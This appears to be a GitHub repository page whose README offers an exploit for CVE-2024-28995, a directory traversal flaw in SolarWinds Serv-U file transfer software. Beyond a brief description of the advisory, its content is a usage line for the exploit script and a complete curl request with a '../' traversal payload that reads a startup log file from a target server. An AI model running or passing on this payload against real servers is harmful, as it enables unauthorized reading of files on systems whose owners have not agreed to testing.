Skip to content

0xc4t/CVE-2024-28995

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 

Repository files navigation

Exploit For CVE-2024-28995

On June 5, 2024, SolarWinds published an advisory for CVE-2024-28995, a high-severity directory traversal vulnerability affecting their file transfer solution Serv-U. The vulnerability was discovered by researcher Hussein Daher of Web Immunify.

Using exploit

python3 CVE-2024-28995.py -t http://example.com/ -f somefile

Using Curl

curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"

Refrence:

About

Exploit for CVE-2024-28995

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages